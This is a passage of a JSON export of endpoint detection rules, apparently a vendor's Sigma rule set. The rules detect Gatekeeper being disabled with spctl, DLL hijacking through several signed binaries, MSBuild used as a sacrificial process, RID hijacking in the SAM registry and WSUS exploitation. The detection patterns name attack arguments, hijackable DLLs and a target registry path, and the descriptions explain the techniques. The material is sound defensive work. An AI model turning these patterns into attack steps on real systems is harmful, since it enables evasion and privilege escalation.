"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617220Z",
"creation_date": "2026-03-23T11:45:34.617222Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617226Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://support.apple.com/fr-fr/guide/security/sec5599b66df/web",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_gatekeeper.yml",
"content": "title: Gatekeeper Disabled\nid: 8b2bdeee-449e-44d1-a27b-e97ae34dfc75\ndescription: |\n Detects the execution of spctl to disable Apple Gatekeeper.\n Apple Gatekeeper is a mechanism that ensures that software comes from recognized developers, is notarized by Apple as malware-free, and remains unaltered.\n Apple Gatekeeper also requests user approval before opening downloaded software for the first time.\n It is recommended to investigate the process that disabled Apple Gatekeeper to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://support.apple.com/fr-fr/guide/security/sec5599b66df/web\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/07/19\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/spctl'\n CommandLine|contains:\n - '--master-disable'\n - '--global-disable'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b2bdeee-449e-44d1-a27b-e97ae34dfc75",
"rule_name": "Gatekeeper Disabled",
"rule_description": "Detects the execution of spctl to disable Apple Gatekeeper.\nApple Gatekeeper is a mechanism that ensures that software comes from recognized developers, is notarized by Apple as malware-free, and remains unaltered.\nApple Gatekeeper also requests user approval before opening downloaded software for the first time.\nIt is recommended to investigate the process that disabled Apple Gatekeeper to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b3c8941-bca5-4ccf-b8d6-2994c01654be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091299Z",
"creation_date": "2026-03-23T11:45:34.091301Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091306Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mfpmp.yml",
"content": "title: DLL Hijacking via mfpmp.exe\nid: 8b3c8941-bca5-4ccf-b8d6-2994c01654be\ndescription: |\n Detects potential Windows DLL Hijacking via mfpmp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mfpmp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\ksuser.dll'\n - '\\MFCORE.dll'\n - '\\MFPlat.DLL'\n - '\\RTWorkQ.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b3c8941-bca5-4ccf-b8d6-2994c01654be",
"rule_name": "DLL Hijacking via mfpmp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mfpmp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b4b8b05-41f2-47f7-afa9-bb3b85ba5bbb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094376Z",
"creation_date": "2026-03-23T11:45:34.094378Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094383Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pwmtower.yml",
"content": "title: DLL Hijacking via PwmTower.exe\nid: 8b4b8b05-41f2-47f7-afa9-bb3b85ba5bbb\ndescription: |\n Detects potential Windows DLL Hijacking via PwmTower.exe related to Trend Micro Password Manager.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessSignature: 'Trend Micro, Inc.'\n ImageLoaded|endswith:\n - '\\nw.dll'\n - '\\nw_elf.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n - '?:\\Windows\\System32\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b4b8b05-41f2-47f7-afa9-bb3b85ba5bbb",
"rule_name": "DLL Hijacking via PwmTower.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PwmTower.exe related to Trend Micro Password Manager.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b5755ff-0a81-449e-afca-7667f8295733",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080631Z",
"creation_date": "2026-03-23T11:45:34.080633Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080637Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_msbuild.yml",
"content": "title: MSBuild.exe Sacrificial Process Spawned\nid: 8b5755ff-0a81-449e-afca-7667f8295733\ndescription: |\n Detects the suspicious execution of the legitimate MSBuild.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action and the destination IP address of the MSBuild.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/07/16\nmodified: 2025/09/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\MSBuild.exe'\n CommandLine|endswith: '\\MSBuild.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b5755ff-0a81-449e-afca-7667f8295733",
"rule_name": "MSBuild.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate MSBuild.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the MSBuild.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2025-07-16",
"rule_modified_date": "2025-09-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b5eb879-9366-4765-b123-05a176322908",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588969Z",
"creation_date": "2026-03-23T11:45:34.588975Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588985Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_searchprotocolhost.yml",
"content": "title: DLL Hijacking via SearchProtocolHost.exe\nid: 8b5eb879-9366-4765-b123-05a176322908\ndescription: |\n Detects potential Windows DLL Hijacking via SearchProtocolHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SearchProtocolHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msftedit.dll'\n - '\\mstracer.dll'\n - '\\tquery.dll'\n - '\\msfte.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b5eb879-9366-4765-b123-05a176322908",
"rule_name": "DLL Hijacking via SearchProtocolHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SearchProtocolHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b6296a9-d84f-4b67-bfee-392455db965e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601288Z",
"creation_date": "2026-03-23T11:45:34.601291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601299Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_csvd.yml",
"content": "title: DLL Hijacking via csvd.exe\nid: 8b6296a9-d84f-4b67-bfee-392455db965e\ndescription: |\n Detects potential Windows DLL Hijacking via csvd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'csvde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b6296a9-d84f-4b67-bfee-392455db965e",
"rule_name": "DLL Hijacking via csvd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via csvd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b67438d-82ee-44cc-8959-570f430d6788",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596136Z",
"creation_date": "2026-03-23T11:45:34.596140Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596147Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://asec.ahnlab.com/en/85942/",
"https://github.com/wgpsec/CreateHiddenAccount",
"https://attack.mitre.org/techniques/T1574/"
],
"name": "t1574_rid_hijacking.yml",
"content": "title: RID Hijacking Detected\nid: 8b67438d-82ee-44cc-8959-570f430d6788\ndescription: |\n Detects a suspicious modification of registry keys storing Windows account parameters related to RID hijacking.\n RID Hijacking is an attack technique that involves modifying the Relative Identifier (RID) value of an account with restricted privileges to match the RID value of an account with higher privileges.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://asec.ahnlab.com/en/85942/\n - https://github.com/wgpsec/CreateHiddenAccount\n - https://attack.mitre.org/techniques/T1574/\ndate: 2025/01/28\nmodified: 2025/05/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\F'\n\n filter_lsass:\n ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n\n exclusion_jumpcloud:\n ProcessImage: '?:\\Program Files\\JumpCloud\\jumpcloud-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JumpCloud Inc'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b67438d-82ee-44cc-8959-570f430d6788",
"rule_name": "RID Hijacking Detected",
"rule_description": "Detects a suspicious modification of registry keys storing Windows account parameters related to RID hijacking.\nRID Hijacking is an attack technique that involves modifying the Relative Identifier (RID) value of an account with restricted privileges to match the RID value of an account with higher privileges.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2025-05-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ba97e80-f511-46d8-bb0a-95b03912ee6a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073404Z",
"creation_date": "2026-03-23T11:45:34.073406Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073410Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hawktrace.com/blog/CVE-2025-59287",
"https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_wsus_exploitation.yml",
"content": "title: Suspicious Process Spawned by WSUS\nid: 8ba97e80-f511-46d8-bb0a-95b03912ee6a\ndescription: |\n Detects a suspicious process execution by WSUS.\n This can be the result of the exploitation of the CVE-2025-59287 vulnerability that allow remote code execution via unsafe deserialization in WSUS, leading to arbitrary commands executed by the IIS worker process (w3wp.exe).\n It is recommended to investigate the spawned process, its command-line and any scripts it might have executed to determine legitimacy.\nreferences:\n - https://hawktrace.com/blog/CVE-2025-59287\n - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/10/21\nmodified: 2025/10/25\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2025-59287\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith: '\\w3wp.exe' # IIS\n ParentCommandLine|contains: ' -ap WsusPool '\n - ParentImage|endswith: '\\WsusService.exe'\n\n exclusion_image:\n Image:\n - '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n - '?:\\Program Files\\Update Services\\Services\\WsusService.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\csc.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\vbc.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ba97e80-f511-46d8-bb0a-95b03912ee6a",
"rule_name": "Suspicious Process Spawned by WSUS",
"rule_description": "Detects a suspicious process execution by WSUS.\nThis can be the result of the exploitation of the CVE-2025-59287 vulnerability, which allows remote code execution via unsafe deserialization in WSUS, leading to arbitrary commands executed by the IIS worker process (w3wp.exe).\nIt is recommended to investigate the spawned process, its command line and any scripts it might have executed to determine legitimacy.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-10-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bbb1fe2-4deb-442f-b7d5-d2e7511696ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094574Z",
"creation_date": "2026-03-23T11:45:34.094576Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
